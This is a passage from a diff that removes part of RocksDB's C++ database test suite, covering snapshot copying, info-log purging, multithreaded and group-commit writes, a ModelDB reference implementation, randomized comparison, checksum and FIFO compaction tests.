-      uint64_t size;
-      ASSERT_OK(env_->GetFileSize(src, &size));
-
-      // record the number and the size of the
-      // latest manifest file
-      if (ParseFileName(files[i].substr(1), &number, &type)) {
-        if (type == kDescriptorFile) {
-          if (number > manifest_number) {
-            manifest_number = number;
-            ASSERT_GE(size, manifest_size);
-            size = manifest_size;  // copy only valid MANIFEST data
-          }
-        }
-      }
-      CopyFile(src, dest, size);
-    }
-
-    // release file snapshot
-    dbfull()->DisableFileDeletions();
-    // overwrite one key, this key should not appear in the snapshot
-    std::vector<std::string> extras;
-    for (unsigned int i = 0; i < 1; i++) {
-      extras.push_back(RandomString(&rnd, 100000));
-      ASSERT_OK(Put(0, Key(i), extras[i]));
-    }
-
-    // verify that data in the snapshot are correct
-    std::vector<ColumnFamilyDescriptor> column_families;
-    column_families.emplace_back("default", ColumnFamilyOptions());
-    column_families.emplace_back("pikachu", ColumnFamilyOptions());
-    std::vector<ColumnFamilyHandle*> cf_handles;
-    DB* snapdb;
-    DBOptions opts;
-    opts.env = env_;
-    opts.create_if_missing = false;
-    Status stat =
-        DB::Open(opts, snapdir, column_families, &cf_handles, &snapdb);
-    ASSERT_OK(stat);
-
-    ReadOptions roptions;
-    std::string val;
-    for (unsigned int i = 0; i < 80; i++) {
-      stat = snapdb->Get(roptions, cf_handles[i < 40], Key(i), &val);
-      ASSERT_EQ(values[i].compare(val), 0);
-    }
-    for (auto cfh : cf_handles) {
-      delete cfh;
-    }
-    delete snapdb;
-
-    // look at the new live files after we added an 'extra' key
-    // and after we took the first snapshot.
-    uint64_t new_manifest_number = 0;
-    uint64_t new_manifest_size = 0;
-    std::vector<std::string> newfiles;
-    dbfull()->DisableFileDeletions();
-    dbfull()->GetLiveFiles(newfiles, &new_manifest_size);
-
-    // find the new manifest file. assert that this manifest file is
-    // the same one as in the previous snapshot. But its size should be
-    // larger because we added an extra key after taking the
-    // previous shapshot.
-    for (size_t i = 0; i < newfiles.size(); i++) {
-      std::string src = dbname_ + "/" + newfiles[i];
-      // record the lognumber and the size of the
-      // latest manifest file
-      if (ParseFileName(newfiles[i].substr(1), &number, &type)) {
-        if (type == kDescriptorFile) {
-          if (number > new_manifest_number) {
-            uint64_t size;
-            new_manifest_number = number;
-            ASSERT_OK(env_->GetFileSize(src, &size));
-            ASSERT_GE(size, new_manifest_size);
-          }
-        }
-      }
-    }
-    ASSERT_EQ(manifest_number, new_manifest_number);
-    ASSERT_GT(new_manifest_size, manifest_size);
-
-    // release file snapshot
-    dbfull()->DisableFileDeletions();
-  } while (ChangeCompactOptions());
-}
-#endif
-
-TEST_F(DBTest, PurgeInfoLogs) {
-  Options options = CurrentOptions();
-  options.keep_log_file_num = 5;
-  options.create_if_missing = true;
-  for (int mode = 0; mode <= 1; mode++) {
-    if (mode == 1) {
-      options.db_log_dir = dbname_ + "_logs";
-      env_->CreateDirIfMissing(options.db_log_dir);
-    } else {
-      options.db_log_dir = "";
-    }
-    for (int i = 0; i < 8; i++) {
-      Reopen(options);
-    }
-
-    std::vector<std::string> files;
-    env_->GetChildren(options.db_log_dir.empty() ? dbname_ : options.db_log_dir,
-                      &files);
-    int info_log_count = 0;
-    for (std::string file : files) {
-      if (file.find("LOG") != std::string::npos) {
-        info_log_count++;
-      }
-    }
-    ASSERT_EQ(5, info_log_count);
-
-    Destroy(options);
-    // For mode (1), test DestroyDB() to delete all the logs under DB dir.
-    // For mode (2), no info log file should have been put under DB dir.
-    std::vector<std::string> db_files;
-    env_->GetChildren(dbname_, &db_files);
-    for (std::string file : db_files) {
-      ASSERT_TRUE(file.find("LOG") == std::string::npos);
-    }
-
-    if (mode == 1) {
-      // Cleaning up
-      env_->GetChildren(options.db_log_dir, &files);
-      for (std::string file : files) {
-        env_->DeleteFile(options.db_log_dir + "/" + file);
-      }
-      env_->DeleteDir(options.db_log_dir);
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-// Multi-threaded test:
-namespace {
-
-static const int kColumnFamilies = 10;
-static const int kNumThreads = 10;
-static const int kTestSeconds = 10;
-static const int kNumKeys = 1000;
-
-struct MTState {
-  DBTest* test;
-  std::atomic<bool> stop;
-  std::atomic<int> counter[kNumThreads];
-  std::atomic<bool> thread_done[kNumThreads];
-};
-
-struct MTThread {
-  MTState* state;
-  int id;
-};
-
-static void MTThreadBody(void* arg) {
-  MTThread* t = reinterpret_cast<MTThread*>(arg);
-  int id = t->id;
-  DB* db = t->state->test->db_;
-  int counter = 0;
-  fprintf(stderr, "... starting thread %d\n", id);
-  Random rnd(1000 + id);
-  char valbuf[1500];
-  while (t->state->stop.load(std::memory_order_acquire) == false) {
-    t->state->counter[id].store(counter, std::memory_order_release);
-
-    int key = rnd.Uniform(kNumKeys);
-    char keybuf[20];
-    snprintf(keybuf, sizeof(keybuf), "%016d", key);
-
-    if (rnd.OneIn(2)) {
-      // Write values of the form <key, my id, counter, cf, unique_id>.
-      // into each of the CFs
-      // We add some padding for force compactions.
-      int unique_id = rnd.Uniform(1000000);
-
-      // Half of the time directly use WriteBatch. Half of the time use
-      // WriteBatchWithIndex.
-      if (rnd.OneIn(2)) {
-        WriteBatch batch;
-        for (int cf = 0; cf < kColumnFamilies; ++cf) {
-          snprintf(valbuf, sizeof(valbuf), "%d.%d.%d.%d.%-1000d", key, id,
-                   static_cast<int>(counter), cf, unique_id);
-          batch.Put(t->state->test->handles_[cf], Slice(keybuf), Slice(valbuf));
-        }
-        ASSERT_OK(db->Write(WriteOptions(), &batch));
-      } else {
-        WriteBatchWithIndex batch(db->GetOptions().comparator);
-        for (int cf = 0; cf < kColumnFamilies; ++cf) {
-          snprintf(valbuf, sizeof(valbuf), "%d.%d.%d.%d.%-1000d", key, id,
-                   static_cast<int>(counter), cf, unique_id);
-          batch.Put(t->state->test->handles_[cf], Slice(keybuf), Slice(valbuf));
-        }
-        ASSERT_OK(db->Write(WriteOptions(), batch.GetWriteBatch()));
-      }
-    } else {
-      // Read a value and verify that it matches the pattern written above
-      // and that writes to all column families were atomic (unique_id is the
-      // same)
-      std::vector<Slice> keys(kColumnFamilies, Slice(keybuf));
-      std::vector<std::string> values;
-      std::vector<Status> statuses =
-          db->MultiGet(ReadOptions(), t->state->test->handles_, keys, &values);
-      Status s = statuses[0];
-      // all statuses have to be the same
-      for (size_t i = 1; i < statuses.size(); ++i) {
-        // they are either both ok or both not-found
-        ASSERT_TRUE((s.ok() && statuses[i].ok()) ||
-                    (s.IsNotFound() && statuses[i].IsNotFound()));
-      }
-      if (s.IsNotFound()) {
-        // Key has not yet been written
-      } else {
-        // Check that the writer thread counter is >= the counter in the value
-        ASSERT_OK(s);
-        int unique_id = -1;
-        for (int i = 0; i < kColumnFamilies; ++i) {
-          int k, w, c, cf, u;
-          ASSERT_EQ(5, sscanf(values[i].c_str(), "%d.%d.%d.%d.%d", &k, &w, &c,
-                              &cf, &u))
-              << values[i];
-          ASSERT_EQ(k, key);
-          ASSERT_GE(w, 0);
-          ASSERT_LT(w, kNumThreads);
-          ASSERT_LE(c, t->state->counter[w].load(std::memory_order_acquire));
-          ASSERT_EQ(cf, i);
-          if (i == 0) {
-            unique_id = u;
-          } else {
-            // this checks that updates across column families happened
-            // atomically -- all unique ids are the same
-            ASSERT_EQ(u, unique_id);
-          }
-        }
-      }
-    }
-    counter++;
-  }
-  t->state->thread_done[id].store(true, std::memory_order_release);
-  fprintf(stderr, "... stopping thread %d after %d ops\n", id, int(counter));
-}
-
-}  // namespace
-
-class MultiThreadedDBTest : public DBTest,
-                            public ::testing::WithParamInterface<int> {
- public:
-  virtual void SetUp() override { option_config_ = GetParam(); }
-
-  static std::vector<int> GenerateOptionConfigs() {
-    std::vector<int> optionConfigs;
-    for (int optionConfig = kDefault; optionConfig < kEnd; ++optionConfig) {
-      // skip as HashCuckooRep does not support snapshot
-      if (optionConfig != kHashCuckoo) {
-        optionConfigs.push_back(optionConfig);
-      }
-    }
-    return optionConfigs;
-  }
-};
-
-TEST_P(MultiThreadedDBTest, MultiThreaded) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  Options options = CurrentOptions(options_override);
-  std::vector<std::string> cfs;
-  for (int i = 1; i < kColumnFamilies; ++i) {
-    cfs.push_back(ToString(i));
-  }
-  Reopen(options);
-  CreateAndReopenWithCF(cfs, options);
-  // Initialize state
-  MTState mt;
-  mt.test = this;
-  mt.stop.store(false, std::memory_order_release);
-  for (int id = 0; id < kNumThreads; id++) {
-    mt.counter[id].store(0, std::memory_order_release);
-    mt.thread_done[id].store(false, std::memory_order_release);
-  }
-
-  // Start threads
-  MTThread thread[kNumThreads];
-  for (int id = 0; id < kNumThreads; id++) {
-    thread[id].state = &mt;
-    thread[id].id = id;
-    env_->StartThread(MTThreadBody, &thread[id]);
-  }
-
-  // Let them run for a while
-  env_->SleepForMicroseconds(kTestSeconds * 1000000);
-
-  // Stop the threads and wait for them to finish
-  mt.stop.store(true, std::memory_order_release);
-  for (int id = 0; id < kNumThreads; id++) {
-    while (mt.thread_done[id].load(std::memory_order_acquire) == false) {
-      env_->SleepForMicroseconds(100000);
-    }
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    MultiThreaded, MultiThreadedDBTest,
-    ::testing::ValuesIn(MultiThreadedDBTest::GenerateOptionConfigs()));
-#endif  // ROCKSDB_LITE
-
-// Group commit test:
-namespace {
-
-static const int kGCNumThreads = 4;
-static const int kGCNumKeys = 1000;
-
-struct GCThread {
-  DB* db;
-  int id;
-  std::atomic<bool> done;
-};
-
-static void GCThreadBody(void* arg) {
-  GCThread* t = reinterpret_cast<GCThread*>(arg);
-  int id = t->id;
-  DB* db = t->db;
-  WriteOptions wo;
-
-  for (int i = 0; i < kGCNumKeys; ++i) {
-    std::string kv(ToString(i + id * kGCNumKeys));
-    ASSERT_OK(db->Put(wo, kv, kv));
-  }
-  t->done = true;
-}
-
-}  // namespace
-
-TEST_F(DBTest, GroupCommitTest) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    env_->log_write_slowdown_.store(100);
-    options.statistics = rocksdb::CreateDBStatistics();
-    Reopen(options);
-
-    // Start threads
-    GCThread thread[kGCNumThreads];
-    for (int id = 0; id < kGCNumThreads; id++) {
-      thread[id].id = id;
-      thread[id].db = db_;
-      thread[id].done = false;
-      env_->StartThread(GCThreadBody, &thread[id]);
-    }
-
-    for (int id = 0; id < kGCNumThreads; id++) {
-      while (thread[id].done == false) {
-        env_->SleepForMicroseconds(100000);
-      }
-    }
-    env_->log_write_slowdown_.store(0);
-
-    ASSERT_GT(TestGetTickerCount(options, WRITE_DONE_BY_OTHER), 0);
-
-    std::vector<std::string> expected_db;
-    for (int i = 0; i < kGCNumThreads * kGCNumKeys; ++i) {
-      expected_db.push_back(ToString(i));
-    }
-    std::sort(expected_db.begin(), expected_db.end());
-
-    Iterator* itr = db_->NewIterator(ReadOptions());
-    itr->SeekToFirst();
-    for (auto x : expected_db) {
-      ASSERT_TRUE(itr->Valid());
-      ASSERT_EQ(itr->key().ToString(), x);
-      ASSERT_EQ(itr->value().ToString(), x);
-      itr->Next();
-    }
-    ASSERT_TRUE(!itr->Valid());
-    delete itr;
-
-    HistogramData hist_data;
-    options.statistics->histogramData(DB_WRITE, &hist_data);
-    ASSERT_GT(hist_data.average, 0.0);
-  } while (ChangeOptions(kSkipNoSeekToLast));
-}
-
-namespace {
-typedef std::map<std::string, std::string> KVMap;
-}
-
-class ModelDB : public DB {
- public:
-  class ModelSnapshot : public Snapshot {
-   public:
-    KVMap map_;
-
-    virtual SequenceNumber GetSequenceNumber() const override {
-      // no need to call this
-      assert(false);
-      return 0;
-    }
-  };
-
-  explicit ModelDB(const Options& options) : options_(options) {}
-  using DB::Put;
-  virtual Status Put(const WriteOptions& o, ColumnFamilyHandle* cf,
-                     const Slice& k, const Slice& v) override {
-    WriteBatch batch;
-    batch.Put(cf, k, v);
-    return Write(o, &batch);
-  }
-  using DB::Delete;
-  virtual Status Delete(const WriteOptions& o, ColumnFamilyHandle* cf,
-                        const Slice& key) override {
-    WriteBatch batch;
-    batch.Delete(cf, key);
-    return Write(o, &batch);
-  }
-  using DB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& o, ColumnFamilyHandle* cf,
-                              const Slice& key) override {
-    WriteBatch batch;
-    batch.SingleDelete(cf, key);
-    return Write(o, &batch);
-  }
-  using DB::Merge;
-  virtual Status Merge(const WriteOptions& o, ColumnFamilyHandle* cf,
-                       const Slice& k, const Slice& v) override {
-    WriteBatch batch;
-    batch.Merge(cf, k, v);
-    return Write(o, &batch);
-  }
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* cf,
-                     const Slice& key, PinnableSlice* value) override {
-    return Status::NotSupported(key);
-  }
-
-  using DB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    std::vector<Status> s(keys.size(),
-                          Status::NotSupported("Not implemented."));
-    return s;
-  }
-
-#ifndef ROCKSDB_LITE
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) override {
-    return Status::NotSupported("Not implemented.");
-  }
-
-  virtual Status VerifyChecksum() override {
-    return Status::NotSupported("Not implemented.");
-  }
-
-  using DB::GetPropertiesOfAllTables;
-  virtual Status GetPropertiesOfAllTables(
-      ColumnFamilyHandle* column_family,
-      TablePropertiesCollection* props) override {
-    return Status();
-  }
-
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) override {
-    return Status();
-  }
-#endif  // ROCKSDB_LITE
-
-  using DB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override {
-    if (value_found != nullptr) {
-      *value_found = false;
-    }
-    return true;  // Not Supported directly
-  }
-  using DB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
-    if (options.snapshot == nullptr) {
-      KVMap* saved = new KVMap;
-      *saved = map_;
-      return new ModelIter(saved, true);
-    } else {
-      const KVMap* snapshot_state =
-          &(reinterpret_cast<const ModelSnapshot*>(options.snapshot)->map_);
-      return new ModelIter(snapshot_state, false);
-    }
-  }
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      std::vector<Iterator*>* iterators) override {
-    return Status::NotSupported("Not supported yet");
-  }
-  virtual const Snapshot* GetSnapshot() override {
-    ModelSnapshot* snapshot = new ModelSnapshot;
-    snapshot->map_ = map_;
-    return snapshot;
-  }
-
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) override {
-    delete reinterpret_cast<const ModelSnapshot*>(snapshot);
-  }
-
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* batch) override {
-    class Handler : public WriteBatch::Handler {
-     public:
-      KVMap* map_;
-      virtual void Put(const Slice& key, const Slice& value) override {
-        (*map_)[key.ToString()] = value.ToString();
-      }
-      virtual void Merge(const Slice& key, const Slice& value) override {
-        // ignore merge for now
-        // (*map_)[key.ToString()] = value.ToString();
-      }
-      virtual void Delete(const Slice& key) override {
-        map_->erase(key.ToString());
-      }
-    };
-    Handler handler;
-    handler.map_ = &map_;
-    return batch->Iterate(&handler);
-  }
-
-  using DB::GetProperty;
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) override {
-    return false;
-  }
-  using DB::GetIntProperty;
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) override {
-    return false;
-  }
-  using DB::GetMapProperty;
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) override {
-    return false;
-  }
-  using DB::GetAggregatedIntProperty;
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* value) override {
-    return false;
-  }
-  using DB::GetApproximateSizes;
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) override {
-    for (int i = 0; i < n; i++) {
-      sizes[i] = 0;
-    }
-  }
-  using DB::GetApproximateMemTableStats;
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) override {
-    *count = 0;
-    *size = 0;
-  }
-  using DB::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* start, const Slice* end) override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& new_options)
-      override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  using DB::CompactFiles;
-  virtual Status CompactFiles(const CompactionOptions& compact_options,
-                              ColumnFamilyHandle* column_family,
-                              const std::vector<std::string>& input_file_names,
-                              const int output_level,
-                              const int output_path_id = -1) override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  Status PauseBackgroundWork() override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  Status ContinueBackgroundWork() override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) override {
-    return Status::NotSupported("Not supported operation.");
-  }
-
-  using DB::NumberLevels;
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) override {
-    return 1;
-  }
-
-  using DB::MaxMemCompactionLevel;
-  virtual int MaxMemCompactionLevel(
-      ColumnFamilyHandle* column_family) override {
-    return 1;
-  }
-
-  using DB::Level0StopWriteTrigger;
-  virtual int Level0StopWriteTrigger(
-      ColumnFamilyHandle* column_family) override {
-    return -1;
-  }
-
-  virtual const std::string& GetName() const override { return name_; }
-
-  virtual Env* GetEnv() const override { return nullptr; }
-
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
-    return options_;
-  }
-
-  using DB::GetDBOptions;
-  virtual DBOptions GetDBOptions() const override { return options_; }
-
-  using DB::Flush;
-  virtual Status Flush(const rocksdb::FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
-    Status ret;
-    return ret;
-  }
-
-  virtual Status SyncWAL() override { return Status::OK(); }
-
-#ifndef ROCKSDB_LITE
-  virtual Status DisableFileDeletions() override { return Status::OK(); }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    return Status::OK();
-  }
-  virtual Status GetLiveFiles(std::vector<std::string>&, uint64_t* size,
-                              bool flush_memtable = true) override {
-    return Status::OK();
-  }
-
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override {
-    return Status::OK();
-  }
-
-  virtual Status DeleteFile(std::string name) override { return Status::OK(); }
-
-  virtual Status GetUpdatesSince(
-      rocksdb::SequenceNumber, unique_ptr<rocksdb::TransactionLogIterator>*,
-      const TransactionLogIterator::ReadOptions& read_options =
-          TransactionLogIterator::ReadOptions()) override {
-    return Status::NotSupported("Not supported in Model DB");
-  }
-
-  virtual void GetColumnFamilyMetaData(
-      ColumnFamilyHandle* column_family,
-      ColumnFamilyMetaData* metadata) override {}
-#endif  // ROCKSDB_LITE
-
-  virtual Status GetDbIdentity(std::string& identity) const override {
-    return Status::OK();
-  }
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override { return 0; }
-
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const override {
-    return nullptr;
-  }
-
- private:
-  class ModelIter : public Iterator {
-   public:
-    ModelIter(const KVMap* map, bool owned)
-        : map_(map), owned_(owned), iter_(map_->end()) {}
-    ~ModelIter() {
-      if (owned_) delete map_;
-    }
-    virtual bool Valid() const override { return iter_ != map_->end(); }
-    virtual void SeekToFirst() override { iter_ = map_->begin(); }
-    virtual void SeekToLast() override {
-      if (map_->empty()) {
-        iter_ = map_->end();
-      } else {
-        iter_ = map_->find(map_->rbegin()->first);
-      }
-    }
-    virtual void Seek(const Slice& k) override {
-      iter_ = map_->lower_bound(k.ToString());
-    }
-    virtual void SeekForPrev(const Slice& k) override {
-      iter_ = map_->upper_bound(k.ToString());
-      Prev();
-    }
-    virtual void Next() override { ++iter_; }
-    virtual void Prev() override {
-      if (iter_ == map_->begin()) {
-        iter_ = map_->end();
-        return;
-      }
-      --iter_;
-    }
-
-    virtual Slice key() const override { return iter_->first; }
-    virtual Slice value() const override { return iter_->second; }
-    virtual Status status() const override { return Status::OK(); }
-
-   private:
-    const KVMap* const map_;
-    const bool owned_;  // Do we own map_
-    KVMap::const_iterator iter_;
-  };
-  const Options options_;
-  KVMap map_;
-  std::string name_ = "";
-};
-
-static std::string RandomKey(Random* rnd, int minimum = 0) {
-  int len;
-  do {
-    len = (rnd->OneIn(3)
-               ? 1  // Short sometimes to encourage collisions
-               : (rnd->OneIn(100) ? rnd->Skewed(10) : rnd->Uniform(10)));
-  } while (len < minimum);
-  return test::RandomKey(rnd, len);
-}
-
-static bool CompareIterators(int step, DB* model, DB* db,
-                             const Snapshot* model_snap,
-                             const Snapshot* db_snap) {
-  ReadOptions options;
-  options.snapshot = model_snap;
-  Iterator* miter = model->NewIterator(options);
-  options.snapshot = db_snap;
-  Iterator* dbiter = db->NewIterator(options);
-  bool ok = true;
-  int count = 0;
-  for (miter->SeekToFirst(), dbiter->SeekToFirst();
-       ok && miter->Valid() && dbiter->Valid(); miter->Next(), dbiter->Next()) {
-    count++;
-    if (miter->key().compare(dbiter->key()) != 0) {
-      fprintf(stderr, "step %d: Key mismatch: '%s' vs. '%s'\n", step,
-              EscapeString(miter->key()).c_str(),
-              EscapeString(dbiter->key()).c_str());
-      ok = false;
-      break;
-    }
-
-    if (miter->value().compare(dbiter->value()) != 0) {
-      fprintf(stderr, "step %d: Value mismatch for key '%s': '%s' vs. '%s'\n",
-              step, EscapeString(miter->key()).c_str(),
-              EscapeString(miter->value()).c_str(),
-              EscapeString(miter->value()).c_str());
-      ok = false;
-    }
-  }
-
-  if (ok) {
-    if (miter->Valid() != dbiter->Valid()) {
-      fprintf(stderr, "step %d: Mismatch at end of iterators: %d vs. %d\n",
-              step, miter->Valid(), dbiter->Valid());
-      ok = false;
-    }
-  }
-  delete miter;
-  delete dbiter;
-  return ok;
-}
-
-class DBTestRandomized : public DBTest,
-                         public ::testing::WithParamInterface<int> {
- public:
-  virtual void SetUp() override { option_config_ = GetParam(); }
-
-  static std::vector<int> GenerateOptionConfigs() {
-    std::vector<int> option_configs;
-    // skip cuckoo hash as it does not support snapshot.
-    for (int option_config = kDefault; option_config < kEnd; ++option_config) {
-      if (!ShouldSkipOptions(option_config, kSkipDeletesFilterFirst |
-                                                kSkipNoSeekToLast |
-                                                kSkipHashCuckoo)) {
-        option_configs.push_back(option_config);
-      }
-    }
-    option_configs.push_back(kBlockBasedTableWithIndexRestartInterval);
-    return option_configs;
-  }
-};
-
-INSTANTIATE_TEST_CASE_P(
-    DBTestRandomized, DBTestRandomized,
-    ::testing::ValuesIn(DBTestRandomized::GenerateOptionConfigs()));
-
-TEST_P(DBTestRandomized, Randomized) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  Options options = CurrentOptions(options_override);
-  DestroyAndReopen(options);
-
-  Random rnd(test::RandomSeed() + GetParam());
-  ModelDB model(options);
-  const int N = 10000;
-  const Snapshot* model_snap = nullptr;
-  const Snapshot* db_snap = nullptr;
-  std::string k, v;
-  for (int step = 0; step < N; step++) {
-    // TODO(sanjay): Test Get() works
-    int p = rnd.Uniform(100);
-    int minimum = 0;
-    if (option_config_ == kHashSkipList || option_config_ == kHashLinkList ||
-        option_config_ == kHashCuckoo ||
-        option_config_ == kPlainTableFirstBytePrefix ||
-        option_config_ == kBlockBasedTableWithWholeKeyHashIndex ||
-        option_config_ == kBlockBasedTableWithPrefixHashIndex) {
-      minimum = 1;
-    }
-    if (p < 45) {  // Put
-      k = RandomKey(&rnd, minimum);
-      v = RandomString(&rnd,
-                       rnd.OneIn(20) ? 100 + rnd.Uniform(100) : rnd.Uniform(8));
-      ASSERT_OK(model.Put(WriteOptions(), k, v));
-      ASSERT_OK(db_->Put(WriteOptions(), k, v));
-    } else if (p < 90) {  // Delete
-      k = RandomKey(&rnd, minimum);
-      ASSERT_OK(model.Delete(WriteOptions(), k));
-      ASSERT_OK(db_->Delete(WriteOptions(), k));
-    } else {  // Multi-element batch
-      WriteBatch b;
-      const int num = rnd.Uniform(8);
-      for (int i = 0; i < num; i++) {
-        if (i == 0 || !rnd.OneIn(10)) {
-          k = RandomKey(&rnd, minimum);
-        } else {
-          // Periodically re-use the same key from the previous iter, so
-          // we have multiple entries in the write batch for the same key
-        }
-        if (rnd.OneIn(2)) {
-          v = RandomString(&rnd, rnd.Uniform(10));
-          b.Put(k, v);
-        } else {
-          b.Delete(k);
-        }
-      }
-      ASSERT_OK(model.Write(WriteOptions(), &b));
-      ASSERT_OK(db_->Write(WriteOptions(), &b));
-    }
-
-    if ((step % 100) == 0) {
-      // For DB instances that use the hash index + block-based table, the
-      // iterator will be invalid right when seeking a non-existent key, right
-      // than return a key that is close to it.
-      if (option_config_ != kBlockBasedTableWithWholeKeyHashIndex &&
-          option_config_ != kBlockBasedTableWithPrefixHashIndex) {
-        ASSERT_TRUE(CompareIterators(step, &model, db_, nullptr, nullptr));
-        ASSERT_TRUE(CompareIterators(step, &model, db_, model_snap, db_snap));
-      }
-
-      // Save a snapshot from each DB this time that we'll use next
-      // time we compare things, to make sure the current state is
-      // preserved with the snapshot
-      if (model_snap != nullptr) model.ReleaseSnapshot(model_snap);
-      if (db_snap != nullptr) db_->ReleaseSnapshot(db_snap);
-
-      Reopen(options);
-      ASSERT_TRUE(CompareIterators(step, &model, db_, nullptr, nullptr));
-
-      model_snap = model.GetSnapshot();
-      db_snap = db_->GetSnapshot();
-    }
-  }
-  if (model_snap != nullptr) model.ReleaseSnapshot(model_snap);
-  if (db_snap != nullptr) db_->ReleaseSnapshot(db_snap);
-}
-
-TEST_F(DBTest, BlockBasedTablePrefixIndexTest) {
-  // create a DB with block prefix index
-  BlockBasedTableOptions table_options;
-  Options options = CurrentOptions();
-  table_options.index_type = BlockBasedTableOptions::kHashSearch;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-
-  Reopen(options);
-  ASSERT_OK(Put("k1", "v1"));
-  Flush();
-  ASSERT_OK(Put("k2", "v2"));
-
-  // Reopen it without prefix extractor, make sure everything still works.
-  // RocksDB should just fall back to the binary index.
-  table_options.index_type = BlockBasedTableOptions::kBinarySearch;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset();
-
-  Reopen(options);
-  ASSERT_EQ("v1", Get("k1"));
-  ASSERT_EQ("v2", Get("k2"));
-}
-
-TEST_F(DBTest, ChecksumTest) {
-  BlockBasedTableOptions table_options;
-  Options options = CurrentOptions();
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Flush());  // table with crc checksum
-
-  table_options.checksum = kxxHash;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_OK(Put("e", "f"));
-  ASSERT_OK(Put("g", "h"));
-  ASSERT_OK(Flush());  // table with xxhash checksum
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_EQ("b", Get("a"));
-  ASSERT_EQ("d", Get("c"));
-  ASSERT_EQ("f", Get("e"));
-  ASSERT_EQ("h", Get("g"));
-
-  table_options.checksum = kCRC32c;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  Reopen(options);
-  ASSERT_EQ("b", Get("a"));
-  ASSERT_EQ("d", Get("c"));
-  ASSERT_EQ("f", Get("e"));
-  ASSERT_EQ("h", Get("g"));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_P(DBTestWithParam, FIFOCompactionTest) {
-  for (int iter = 0; iter < 2; ++iter) {
-    // first iteration -- auto compaction
-    // second iteration -- manual compaction
-    Options options;
-    options.compaction_style = kCompactionStyleFIFO;
-    options.write_buffer_size = 100 << 10;  // 100KB
-    options.arena_block_size = 4096;
-    options.compaction_options_fifo.max_table_files_size = 500 << 10;  // 500KB
-    options.compression = kNoCompression;
-    options.create_if_missing = true;
-    options.max_subcompactions = max_subcompactions_;
-    if (iter == 1) {
-      options.disable_auto_compactions = true;
-    }
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int i = 0; i < 6; ++i) {
-      for (int j = 0; j < 110; ++j) {
-        ASSERT_OK(Put(ToString(i * 100 + j), RandomString(&rnd, 980)));
-      }
-      // flush should happen here
-      ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-    }
-    if (iter == 0) {
-      ASSERT_OK(dbfull()->TEST_WaitForCompact());
-    } else {
-      CompactRangeOptions cro;
-      cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-      ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-    }
-    // only 5 files should survive
-    ASSERT_EQ(NumTableFilesAtLevel(0), 5);
-    for (int i = 0; i < 50; ++i) {
-      // these keys should be deleted in previous compaction
